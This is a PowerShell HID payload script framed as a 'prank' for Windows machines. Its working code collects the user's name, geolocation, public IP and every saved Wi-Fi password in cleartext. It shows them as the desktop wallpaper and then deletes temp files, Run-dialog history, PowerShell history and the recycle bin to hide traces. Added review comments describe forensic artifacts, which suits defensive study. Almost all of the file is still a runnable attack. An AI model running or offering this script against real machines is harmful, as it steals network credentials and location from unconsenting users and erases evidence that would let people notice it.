############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and the SSID and WiFi password of any current or previously connected networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop
#>
#############################################################################################################################################
# Text that is later written to %TEMP%\foo.txt and appended, byte for byte, to the end of
# the generated wallpaper file by the `copy /b` step further down. It is not encoded
# into the pixel data.
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# Base name of the file written to the user's Desktop as "<ImageName>.jpg".
# With the value below, an unmodified copy of this script leaves Desktop\dont-be-suspicious.jpg.
$ImageName = "dont-be-suspicious"
#############################################################################################################################################
<#
.NOTES
Get-Name returns the UserName property of Win32_ComputerSystem, read through CIM.
NOTE(review): that property is normally the interactively logged-on account in
DOMAIN\user form rather than the display name of a Microsoft account - confirm.
If the CIM call throws, the function writes an error and falls back to $env:UserName.
#>
function Get-Name {
try {
$fullName = (Get-CimInstance -ClassName Win32_ComputerSystem).UserName
} catch {
Write-Error "No name was detected"
return $env:UserName
}
return $fullName
}
$fn = Get-Name
# Every collected item is appended in plain text to %TEMP%\foo.txt. That file is the
# staging artifact that is later rendered into the wallpaper image. Because ">>" appends,
# content left over from an earlier run of the script would be kept as well.
echo "Hey $fn" >> "$Env:temp\foo.txt"
echo "`nYour computer is not very secure" >> "$Env:temp\foo.txt"
#############################################################################################################################################
<#
.NOTES
Get-GeoLocation loads System.Device and starts a GeoCoordinateWatcher, then polls it
every 100 ms until its Status is 'Ready' or its Permission is 'Denied'.
Returns "Latitude: <lat>, Longitude: <lon>" on success and the literal string
"No Coordinates found" when permission is denied or an exception is caught.
The polling loop has no timeout: if neither state is ever reached it does not end.
NOTE(review): the watcher presumably goes through the Windows location service, so the
host's location privacy setting would decide whether Permission is 'Denied' - confirm.
#>
function Get-GeoLocation {
try {
Add-Type -AssemblyName System.Device
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher
$GeoWatcher.Start()
# Busy-wait (100 ms steps) until the watcher is ready or access has been refused.
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100
}
if ($GeoWatcher.Permission -eq 'Denied') {
Write-Error 'Access Denied for Location Information'
return "No Coordinates found"
} else {
$location = $GeoWatcher.Position.Location
return "Latitude: $($location.Latitude), Longitude: $($location.Longitude)"
}
} catch {
Write-Error "No coordinates found"
return "No Coordinates found"
}
}
$GL = Get-GeoLocation
# Both failure paths return a non-empty string, so this condition is true in every case
# and "No Coordinates found" is written to %TEMP%\foo.txt when no position was obtained.
if ($GL) { echo "`nYour Location: `n$GL" >> "$Env:temp\foo.txt" }
#############################################################################################################################################
<#
.NOTES
Get-PubIP requests http://ipinfo.io/ip with Invoke-WebRequest -UseBasicParsing and
returns the trimmed response body; on any caught exception it writes an error and
returns $null.
The request is plain HTTP (no TLS) to a third-party host, so it is an outbound
network artifact of the script that proxy, DNS and flow logs can show.
#>
function Get-PubIP {
try {
$computerPubIP = (Invoke-WebRequest -Uri "http://ipinfo.io/ip" -UseBasicParsing).Content.Trim()
} catch {
Write-Error "No Public IP was detected"
return $null
}
return $computerPubIP
}
$PubIP = Get-PubIP
# Only a non-empty result is appended to the staging file %TEMP%\foo.txt.
if ($PubIP) { echo "`nYour Public IP: $PubIP" >> "$Env:temp\foo.txt" }
###########################################################################################################
<#
.NOTES
Password last Set
Get-Days_Set runs `net user <current user>`, picks the line matching "Password last set"
and returns the text after the first colon. The number of days since that date is
computed into $time but never used, so no tailored response is produced here.
If the line is missing or the [datetime] cast fails, the catch branch writes an error
and returns $null.
NOTE(review): the match depends on the English label "Password last set"; on a
localized system the lookup presumably fails - confirm.
NOTE(review): net.exe started as a child of PowerShell is a process-creation artifact
of this step - confirm what the host's process auditing records.
#>
function Get-Days_Set {
try {
$pls = (net user $env:USERNAME | Select-String -Pattern "Password last set").ToString().Trim()
# Keep only the value to the right of the first ':' in the matched line.
$pls = $pls.Substring($pls.IndexOf(":") + 1).Trim()
# Computed but unused; the cast also acts as a validity check that can throw into catch.
$time = ((Get-Date) - [datetime]$pls).Days
return $pls
} catch {
Write-Error "Day password set not found"
return $null
}
}
$pls = Get-Days_Set
# Only a non-empty result is appended to the staging file %TEMP%\foo.txt.
if ($pls) { echo "`nPassword Last Set: $pls" >> "$Env:temp\foo.txt" }
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This section lists the WLAN profiles saved on the machine with netsh.exe and, for each
one, asks netsh to print the profile with key=clear and reads the "Key Content" line.
The results are appended to %TEMP%\foo.txt as "<profile> : <key>" lines in plain text;
the code below does not write a separate "..._WiFi-PWD.txt" file.
The netsh.exe command line containing `key=clear` is issued once per saved profile,
so process-creation logging that captures command lines records each lookup.
#>
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
# Get all the WLAN profile names: keep every output line that contains " : "
$Output = netsh.exe wlan show profiles | Select-String -Pattern " : "
# Trim the output to receive only the name (the text after the first ':')
Foreach($WLANProfileName in $Output) {
$WLANProfileNames += ($WLANProfileName -split ":")[1].Trim()
}
$WLANProfileObjects =@()
# Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames) {
try {
$WLANProfilePassword = (netsh.exe wlan show profiles name="$WLANProfileName" key=clear | Select-String -Pattern "Key Content").ToString().Split(":")[1].Trim()
} catch {
# Reached when the profile output has no "Key Content" line (ToString() on no match throws).
$WLANProfilePassword = "The password is not stored in this profile"
}
$WLANProfileObject = [PSCustomObject]@{
ProfileName = $WLANProfileName
ProfilePassword = $WLANProfilePassword
}
$WLANProfileObjects += $WLANProfileObject
}
# Append one "<profile> : <key>" line per profile to the plain-text staging file.
if ($WLANProfileObjects) {
echo "`nW-Lan profiles: ===============================" >> "$Env:temp\foo.txt"
$WLANProfileObjects | ForEach-Object { echo "$($_.ProfileName) : $($_.ProfilePassword)" >> "$Env:temp\foo.txt" }
}
#############################################################################################################################################
<#
.NOTES
This reads the dimensions of the target's screen, which are used as the size of the
wallpaper bitmap. Add-Type compiles the inline C# below into a PInvoke class exposing
user32!GetDC and gdi32!GetDeviceCaps.
NOTE(review): in Windows PowerShell, Add-Type with C# source typically runs the C#
compiler and leaves temporary files behind; that would be a host artifact of this
step - confirm for the PowerShell version in use.
#>
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
# GetDC with a null window handle asks for the device context of the whole screen.
# The handle is not released anywhere in the visible code (no ReleaseDC call).
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
# Index 118 is DESKTOPHORZRES and 117 is DESKTOPVERTRES in the GetDeviceCaps API.
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
#############################################################################################################################################
<#
.NOTES
This takes the information gathered in %TEMP%\foo.txt and renders it as black
Consolas 18 text at offset (500, 100) on a white bitmap of the screen size, then saves
the bitmap to %TEMP%\foo.jpg.
NOTE(review): Save() is called with a path only and no image format; System.Drawing
presumably falls back to PNG encoding here, so the file content would not match its
.jpg extension - confirm. Such an extension/content mismatch is a useful triage signal.
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:temp\foo.jpg"
$bmp = New-Object System.Drawing.Bitmap $w, $h
$font = New-Object System.Drawing.Font "Consolas", 18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
# Paint the whole canvas white before drawing the text.
$graphics.FillRectangle($brushBg, 0, 0, $bmp.Width, $bmp.Height)
# -Raw reads the staging file as one string, keeping its line breaks.
$content = Get-Content "$Env:temp\foo.txt" -Raw
$graphics.DrawString($content, $font, $brushFg, 500, 100)
# Only the Graphics object is disposed; $bmp and $font are not disposed in the visible code.
$graphics.Dispose()
$bmp.Save($filename)
#############################################################################################################################################
<#
.NOTES
This overwrites %TEMP%\foo.txt with the hidden message, then uses `copy /b` to
concatenate the image and that text file into Desktop\<ImageName>.jpg, and finally
removes the two temp files.
The message is appended after the image data, not hidden inside the pixels, so it
shows up as trailing bytes after the image's end marker in a hex view of the file.
The rendered image still displays everything that was collected (account name,
location, public IP, Wi-Fi keys), so the Desktop file holds those credentials in
readable form.
#>
# ">" replaces the collected text with the message before the concatenation.
# NOTE(review): Windows PowerShell redirection presumably writes UTF-16 here - confirm.
echo $hiddenMessage > "$Env:temp\foo.txt"
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
# Errors are suppressed, so a failed delete leaves the staging files in %TEMP% silently.
Remove-Item "$env:TEMP\foo.txt", "$env:TEMP\foo.jpg" -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
<#
.NOTES
Set-WallPaper sets the current user's desktop wallpaper.
Parameters:
  -Image  (mandatory) path of the image file to apply.
  -Style  one of Fill, Fit, Stretch, Tile, Center, Span; defaults to Center.
It writes WallpaperStyle and TileWallpaper under HKCU:\Control Panel\Desktop and then
calls user32!SystemParametersInfo with SPI_SETDESKWALLPAPER.
The integer returned by SystemParametersInfo is not captured, so it is emitted as the
function's output.
#>
function Set-WallPaper {
param (
[parameter(Mandatory=$true)]
[string]$Image,
[parameter(Mandatory=$false)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style = "Center"
)
# Map the style name to the WallpaperStyle registry value. Tile and Center share "0";
# they are told apart by the TileWallpaper value written below.
$WallpaperStyle = Switch ($Style) {
"Fill" { "10" }
"Fit" { "6" }
"Stretch" { "2" }
"Tile" { "0" }
"Center" { "0" }
"Span" { "22" }
}
# Both branches write WallpaperStyle; only the TileWallpaper value differs (1 for Tile).
if ($Style -eq "Tile") {
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -Value $WallpaperStyle
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -Value 1
} else {
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -Value $WallpaperStyle
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -Value 0
}
# Compile a small C# wrapper (class Params) around user32!SystemParametersInfo.
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Params {
[DllImport("User32.dll", CharSet = CharSet.Unicode)]
public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
# The two flags are OR-ed together: 0x01 persists the change to the user profile and
# 0x02 broadcasts the setting change, per the variable names used here.
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
[Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $UpdateIniFile -bor $SendChangeEvent)
}
#############################################################################################################################################
<#
.NOTES
Clean-Exfil removes local traces of the run. It performs four deletions:
  1. everything under the user's %TEMP% folder (all content, not only this script's files),
  2. all values of the Explorer RunMRU key (Run dialog history),
  3. the PSReadLine command history file,
  4. the contents of the recycle bin.
Nothing in the visible code touches the Windows event logs.
NOTE(review): where PowerShell script block logging or process-creation auditing is
enabled, records of the run would be expected to remain after this function - confirm
against the host's audit policy. The deletions themselves (a RunMRU wipe, removal of
the history file) are observable changes that can serve as indicators.
#>
function Clean-Exfil {
# Delete contents of Temp folder
Remove-Item "$env:TEMP\*" -Recurse -Force -ErrorAction SilentlyContinue
# Delete run box history (/va removes every value under the key, /f skips the prompt)
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
# Delete powershell history (no -ErrorAction here, so a failure is reported)
Remove-Item (Get-PSReadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
#############################################################################################################################################
# Apply the Desktop image as the wallpaper (Center style), then run the trace removal.
# The image on the Desktop is outside %TEMP%, so Clean-Exfil does not delete it: that
# file, the two HKCU:\Control Panel\Desktop values and the changed wallpaper remain on
# the host after the script ends.
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
Clean-Exfil